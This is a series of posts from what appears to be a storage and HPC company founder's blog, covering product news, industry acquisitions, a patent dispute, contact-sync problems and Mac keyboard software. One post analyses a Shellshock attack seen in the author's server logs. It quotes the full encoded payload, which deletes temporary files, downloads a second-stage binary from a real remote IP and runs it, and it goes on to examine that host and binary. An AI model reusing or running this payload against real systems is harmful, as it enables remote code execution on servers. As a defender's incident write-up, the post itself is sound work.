The worlds fastest hyper-converged appliance is faster and more affordable than ever

This is a very exciting hyper-converged system, representing our next generation of time series, and big data analytical systems. Tremendous internal bandwidths coupled with massive internal parallelism, and minimal latency design on networks. This unit has been designed to focus upon delivering the maximal performance possible in an as minimal footprint … both rack based and cost wise … as possible.

You can use these as independent stand alone units, integrate them into a larger FastPath Unison system

We have our software stack (SIOS) integrated onto each unit, and include our builds of Python + Pandas/SciPy/NumPy, R, and Perl. We pre-install and configure Kx’s excellent kdb+ (32 bit version, and provide a 64 bit install, though you will need to get your own license file), and InfluxDB (http://influxdb.com) with our interface to it (https://github.com/joelandman/influxdbcli). That interface will soon be able to speak to many databases and help you do ETL and other data motion/transformational operations across multiple platforms. The units all include our sios-metrics tools (https://github.com/joelandman/sios-metrics) for monitoring.

We’ve sold a number of these units in recent days. Looking to bring one with me to HPC on Wall Street next month (might be the 4U 48 bay version though).

Its a very exciting time right now, lots of good things happening. More soon … I promise.

Viewed 15581 times by 1923 viewers

Interesting Q1 so far for day job

Our Q1 is usually quiet, fairly low key. Not this one. Looks like lots of pent up demand. We are deep into record territory, running 200+% of normal, with possibility of more.

Another new wrinkle is that our small investment round is mostly complete. This is new territory for us, and you may have noticed I’d backed off posting intensity over the last half year or so while this was going on. Its a long, complex, and annoying experience in many regards. I won’t detail it here. But I will say that we are grateful to those whom believed in our business enough to bet on it.

Many other things are happening, not the least of which is the complete validation of what we’ve been talking about for years with tightly coupled computing. While the industry calls this “hyperconverged”, and we are fine to adopt that moniker, our points about this being pretty much the only realistic path forward to build scalable infrastructure (see what I did there? Didja?) are being trumpeted loudly by numerous companies and analysts. It helps when they raise $100M+ (dear lord!) to pursue this market, and the press continues very favorable reporting of it. This said, over the last 6 months, people have stopped asking us what tightly coupled/hyperconverged computing means, and started asking what are the issues.

And that gets me to the last bit. Another of our core messages, we are starting to see people really get. Performance matters. You can’t cost effectively build/run inefficient systems at any scale, even in a cloud …. no …. especially not in a cloud, and hope to maximize the impact and effectiveness of your expenditure. Armies of crappy/inefficient machines shared amongst many people are inefficient machines. This is fine for web servers. This is double plus ungood for big data analytics and storage. You need performant, efficient systems for this. This has been our message with tightly coupled/hyperconverged systems. This is why our small machines bested machines with 2-4x processing power, 2-4x ram, and 10x number of spindles on STAC M3 tests over the years.

As I say these days, you can’t fake performance.

More soon. Really. The team wants me to blog more … and I am guessing this means at work.

Viewed 18470 times by 2122 viewers

Π day has come

I like Π … apple, cherry, etc.

For those whom don’t get the pun, dates in the US are often written as Month/Day/Year, with year being abbreviated by 2 digits. So with this formatting, today is 3/14/15, or roughly the first 5 digits of Π, which is defined to be the ratio of circumference to diameter of circle on a 2D plane.

You can extend the pun, by noting at 9:26.53 it is “more precise”.

It is generally nonsensical, but its a fun excuse to make/get a pie and share it with family/friends.

We had a peach Π at the office yesterday. Yum!

For what its worth, I prefer a different date format, day-Month_name-Year, and its rather hard there to get to Π day, so I am going to borrow this one and enjoy it with the family.

Viewed 18115 times by 2099 viewers

Has Alibaba been compromised?

I saw this attack in the day job’s web server logs today. From IP address 198.11.176.82, which appears to point back to Alibaba.

This doesn’t mean anything in and of itself, until we look at the payload.

()%20%7B%20:;%20%7D;%20/bin/bash%20-c%20/x22rm%20-rf%20/tmp/*;echo%20wget%20http://115.28.231.237:999/htrdps%20-O%20/tmp/China.Z-thpwx%20%3E%3E%20/tmp/Run.sh;echo%20echo%20By%20China.Z%20%3E%3E%20/tmp/Run.sh;echo%20chmod%20777%20/tmp/China.Z-thpwx%20%3E%3E%20/tmp/Run.sh;echo%20/tmp/China.Z-thpwx%20%3E%3E%20/tmp/Run.sh;echo%20rm%20-rf%20/tmp/Run.sh%20%3E%3E%20/tmp/Run.sh;chmod%20777%20/tmp/Run.sh;/tmp/Run.sh/x22

This appears to be an attempt to exploit a bash hole. What is interesting is the IP address to pull the second stage payload from.

Run a whois against that … I’ll wait.

In the records we see a number of things:

inetnum	115.28.0.0 - 115.29.255.255
netname	ALISOFT
descr	Aliyun Computing Co., LTD
descr	5F, Builing D, the West Lake International Plaza of S&T
descr	No.391 Wen'er Road, Hangzhou, Zhejiang, China, 310099
country	CN

...

 
phone	+86-[redacted]
e-mail	[redacted]@alibaba-inc.com
nic-hdl	ZM1015-AP
mnt-by	MAINT-CNNIC-AP
changed	ipas@cnnic.net 20130730
source	APNIC

...

Where I hand redacted the name/email/phone from the information. Easy enough to find, but note the email address.

Who is Alisoft?

Well, according to Crunchbase

Alisoft develops, markets and delivers Internet-based business management software targeting Small and Medium Enterprises (SMEs) in China. Founded by parent Alibaba Group, Alisoft is currently offering five different services: Customer relationship management (CRM), Inventory management, Sales force management, Financial tools,and Marketing information

This could be simply one compromised machine. Never attribute to malice that which may be better explained by incompetence. They wouldn’t leave a machine wide open, right?

landman@lightning:~$ nmap 115.28.231.237

Starting Nmap 6.40 ( http://nmap.org ) at 2015-03-11 19:30 EDT
Nmap scan report for 115.28.231.237
Host is up (0.26s latency).
Not shown: 985 closed ports
PORT     STATE    SERVICE
42/tcp   filtered nameserver
135/tcp  filtered msrpc
139/tcp  filtered netbios-ssn
445/tcp  filtered microsoft-ds
593/tcp  filtered http-rpc-epmap
999/tcp  open     garcon
1023/tcp filtered netvenuechat
1025/tcp filtered NFS-or-IIS
1068/tcp filtered instl_bootc
1434/tcp filtered ms-sql-m
3389/tcp open     ms-wbt-server
4444/tcp filtered krb524
5800/tcp filtered vnc-http
5900/tcp filtered vnc
6669/tcp filtered irc

oh … well … maybe …

Ok, but this wouldn’t be conspicuously serving and easily accessible on that port 999, right? So lets fire up links and see what we see …



Oh … my.

Ok, for laughs, let me pull down the payload. And look at it with strings. See if I see anything in there.

strings /tmp/evil

...

$Info: This file is packed with the UPX executable packer http://upx.sf.net $
$Id: UPX 3.91 Copyright (C) 1996-2013 the UPX Team. All Rights Reserved. $
PROT_EXEC|PROT_WRITE failed.

Ok, its UPX compressed. Lets look into it some more.

landman@lightning:/tmp$ upx-3.91-amd64_linux/upx -l evil 
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2013
UPX 3.91        Markus Oberhumer, Laszlo Molnar & John Reiser   Sep 30th 2013

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
   1513570 ->    416596   27.52%  netbsd/elf386  evil

and sure enough

landman@lightning:/tmp$ ls -al evil 
-rw-r--r-- 1 landman landman 1513570 Mar 11 19:36 evil

landman@lightning:/tmp$ file evil
evil: ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped

Again, run strings and … whoa! Someone used a -g when compiling, there are a metric butt-load of symbols in there. Seriously … Its obviously c++ source as it turns out, and its been internationalized.

And there are misspellings …

19CThreadAttackKernal

It seems to want to play with TLS. I am guessing not in a good way.

But this said, I was looking for another address, either IP address or web address, or something.

Sure enough, strings found this

www.baidu.com

...

8.8.8.8

In the end I did this

landman@lightning:/tmp$ rm -f evil

Were it really so simple.

Next up, I may send them an email point out the … er… badly misconfigured unit, and the attack server set up on it. And the attack coming from their site at a different address.

This reminds me of the Moscow rules. Once is an accident, twice is coincidence. Three times is enemy action.

Viewed 23376 times by 2552 viewers

A completely unsolved problem

contact management across multiple devices/OSes/applications. Yeah, I know, just use iCloud/Gmail/etc.

Except they are all broken. And not a little bit.

I rely upon one, consistent, correct contact list that has email, phone, etc. for all the people I know and communicate with. In years past, I’ve had this list sync back and forth to Gmail via google. And it used to work.

Then iPhone5 and well, ya know, it broke. Not so curiously, iPhone also broke google calendar integration. And while we were at it, google seemed to break the various apps that used to work with it perfectly for thunderbird email integration.

Same list, sometime it would sync. Sometimes not.

The iphone5 would wind up doing something that looked like a massive blow up in number of contacts. As you added more contacts, things slowed down. Drastically. Tremendously. All aspects of the phone were slower. Nothing was fast.

Same with Thunderbird. And all the other mail apps. Everywhere.

Phone dialing was a joke thereafter. Contact list would take 10-30 seconds to show up. I kid you not.

I would dial a number, the screen would remain blank while I heard it go through, but with no controls, save an on-off button.

This was true on iOS and Android. On Thunderbird, as the size of the contact list exploded from about 2k names to 20k names, address completion would lock up the client.

Ok, there are a few issues here. I’ll take a wild guess, but should I assume that someone is using an O(n^2) algorithm for sorting lists? Or full “table” scans for lookup? I have doubts that a quad core CPU such as in the Android can be so easily swamped.

The problem with the contact lists appears to be in part on the server side, and in part on the client side. The clients appear to be fairly dumb. But so are the servers. Bi-directional sync is the cause of the massive explosion of contacts (10x per day, growing exponentially). This leads to all manner of interesting behaviors being exposed.

Basically I think we need to re-think the contact list. I think it is horribly broken across pretty much all clients at the moment. The only saving grace on the server side is the duplicate removal. It allows me to iteratively repair a list gone horribly wrong.

This said, I think I’ve found my next project. A proper, and intelligent (and secure at that) cloud based server handling contact data. A sane set of clients for Android and iOS to correctly populate/manage/update. A sane set of clients for Thunderbird etc. to locally populate. An easy way to backup, restore, browse, search, integrate, separate, and otherwise manage the data.

And if someone else has already done this, so as to save me the joy of developing this myself, please let me know. All I find online are fact-free reviews of silly apps that sort-kinda-but-not-really work.

Viewed 26353 times by 2628 viewers

Scalable Informatics customer Milford Film and Animation does awesome projects

Its nice to hear success stories from our customers. In this case, our friends and customers at Milford Film and Animation have been using our systems for a number of years to provide the basis for their storage efforts.

Their systems are very computationally, network, and IO intensive. There is a tremendous amount of rendering, editing, and many other things that require absolutely the highest performance you can get in a dense package. Our goal is to make the storage aspect not something they ever need to think about. Make sure it is as performant and reliable as possible.

So we do. And here is an example of their work.

You may have seen other examples of their work at our booth at SC14. A fantastic customer, a terrific use case.

Imagine what we can do for anyone in this space … Our systems run near peak performance an efficiency on a continuous basis for long duration of intensive use. We help our customers be successful … we need them to be successful. And we’ll pull out the stops to make sure that they are, that our kit and capabilities contribute to their success. The rest is up to them.

As you can see from the clip, and the other bits they have, Milford is a wonderful and creative partner to work with. I wish we had many more like them!

Viewed 32108 times by 2979 viewers

My vote for most awesome Mac OSX software

Karabiner If you switch back and forth between Linux and Mac on same keyboard, this is an absolute must have.

From my perspective, the keys in Mac are horribly borked. Home and End do not do what I expect. Control-Anything doesn’t work except in exceptional cases. iTerm2 (also very good Mac software) largely does the right thing on its own, but the keyboard side of MacOSX is basically borked. This lets you unbork it.

That is huge. I’ve been looking for this for years. The page that pointed me to it is here. My google-fu must not have been good in the past, as this is the first time I’d seen this …

What brought this about was sheer frustration at hitting the home key, expecting it to go to the beginning of the paragraph/line in Keynote, and watching it, insanely, go to the beginning of the file. And the same thing with end, though this time to the end of the file.

Seriously, this tool unborks that-which-was-borked.

Viewed 25149 times by 3064 viewers

Memory channel flash: is it over?

[full disclosure: day job has a relationship with Diablo]

Russell just pointed this out to me.

The short (pedestrian) version (I’ve got no information that is not public, so I can’t disclose something I don’t know anyway): Netlist filed a patent infringement suit against Diablo, and then included SanDisk as they bought Smart Storage, whom worked with Diablo prior to Smart being acquired by SanDisk. Netlist appears to have won an, at least temporary, injunction against Diablo.

Netlist makes fast DIMM chips and has IP in the fast DIMM interface. Yeah, highly simplified, but this is approximately correct. Its definitely more involved than that, but this is the pedestrian version.

Netlist claimed, and apparently convinced a patent court that it was being damaged by Diablo’s use of its IP. I know that part is in dispute by Diablo, and I cannot, and will not, comment on the merits of either the suit or any counter-suit.

It seems as part of this injunction involved SanDisk not being allowed to sell/ship its inventory. This aspect was just lifted. But SanDisk cannot acquire any more.

So what does this portend for memory channel flash?

I liked the idea, but for different reasons than others had been talking about in public. I’ve always felt that IO channel memory was a throwback to the old XMM/EMM PC days. What, you don’t remember those days? Putting a windowed ram card in an expansion chassis, addressing it 64kB at a time. It had some utility, but it used up valuable IO space. And it was slower than memory near the CPU. This was cured by using bigger memory address space systems.

Similarly, I looked at memory channel flash as a way to get flash closer to the CPU and away from the valuable IO channel lines. It could never really be primary memory, or even primary storage (unlike a number of pundits suggesting as such, this was a terrible idea). It would be fantastic as a temp space for paging, or for certain types of caching or persistence.

But thats on hold now, as Diablo and Netlist fight it out.

I’m not happy with this, and had hoped that a nice cross licensing would fix this quickly. Doesn’t look like this is happening though. And as Diablo is a startup, how long will they be able to hold out with revenues falling off? I am guessing they would be an acquisition target now for the likes of SanDisk or others (IBM?) whom has more power to push a deal with Netlist.

Not a great situation, though I am still hopeful for the Diablo team and the product. It looks really good, and we have a great use case.

Netlist isn’t a patent troll, they are legitimate technology company with interesting low latency memory DIMM technology. They came to our attention a number of years ago when we had very focused HFT customers trying to eek out any advantage anywhere. Diablo has been making good things IMO. I do wish there was a way to make this work for all.

Viewed 23557 times by 3038 viewers

New all-flash-array: SanDisk’s Infiniflash

Interesting development from SanDisk. Not quite an M&A bit, but an attempt at accelerating adoption of non-spinning storage by bringing out a proof of concept product in a few flavors. They are aiming at $2/GB for this system.

This is an array product though, so you need to attach it to a set of servers. Also, for something this large, the spec’s are kind of disappointing. 7GB/s maximum and 1M IOPs. Density up to 1/2 PB in 3U. We are currently at 1/4 PB in 4U, combined with a massive IO/compute/network capability, so that part is interesting. Our next gen will put that to shame though.

Not for nothing, but siFlash did 30+GB/s at much more than 1M IOPs (in an end user/real world test) 2 years ago. Indeed our new range of Cadence devices are … significant steps up from this … . Sadly, for that test, thanks to SanDisk’s acquisitive nature, our supplier for SSDs was bought, they jacked up the price of our drives, and drove the customer to seek other, low performance and low cost options. I don’t precisely know how they are doing, but I get the sense that they may realize you can’t fake performance, which is a problem if what you need, is, performance.

What makes this interesting is that this is a shot across the bows of Violin, Kaminario, Violin, Pure, Skyera, and many others. We don’t see this as particularly competitive in our space (Big Data appliances), as its a pure storage array. Moreover, our spinning disk systems do 7GB/s sustained, have integrated computers, 10GbE, 40GbE, IB, and in very short order, something much faster.

Moreover, Wikibon and others predict that the SAN market (that this is very much a play for) is in decline. Building new SAN elements today probably isn’t a good long term strategy.



But, understand what SanDisk wants to do. They want to spur adoption of flash. They want to be able to generate sufficient demand so that they can build more flash, more flash fab lines (not cheap!).

There are many contenders for the next generation of non-volatile memory (NVM). All of these contenders may have interesting advantages or drawbacks relative to flash. Flash’s big one is the limited number of write cycles. This said, I don’t see flash going away any time soon. Industry momentum is built up by folks like SanDisk pushing hard on things like this.

If anything, this will likely spur other vendors to either build or buy their own version of this. Moreover, with the advent of Big Data, dumb arrays are basically on the way out as Wikibon (and many others) have noted. This is part of why folks like EMC were looking for new things to freshen their business last year. They are arrays and filer heads. And other things in the federated company, but thats the storage side.

So I expect this announcement to light fires under folks like WD/HGST (hey, look, they just bought Amplidata), Seagate (Xyratex), SanDisk (FusioIO). Toshiba still hasn’t gotten into this game.

But I expect things like this to drive more M&A.

Viewed 23506 times by 3019 viewers

M&A: HGST acquires Amplidata

This is closer to home. Amplidata is an erasure coded cold storage system atop “cheap” hardware. HGST makes, of course, storage devices.

This continues a trend in vertical integration of folks with systems experience, and folks who make the things that go into these systems. If you control more of the stack, you can create more value to your bottom line … up to a point.

The flip side to this is if you start competing with your customers. This is a good way to kill a channel, and drive customers to your competitors.

The only major tier 1 vendor I don’t see doing this now is Toshiba. HGST/WD, Seagate, Sandisk are all building vertically, with integrated units of one sort or the other.

All these systems will compete with some segment of their customer base though. Finding and striking that balance is important. Where you can add value (cold storage, big data, massive performance storage) is where they could play nicely.

I do expect this to be fairly disruptive to a number of vendors in the space. Should be quite interesting.

Viewed 20291 times by 2947 viewers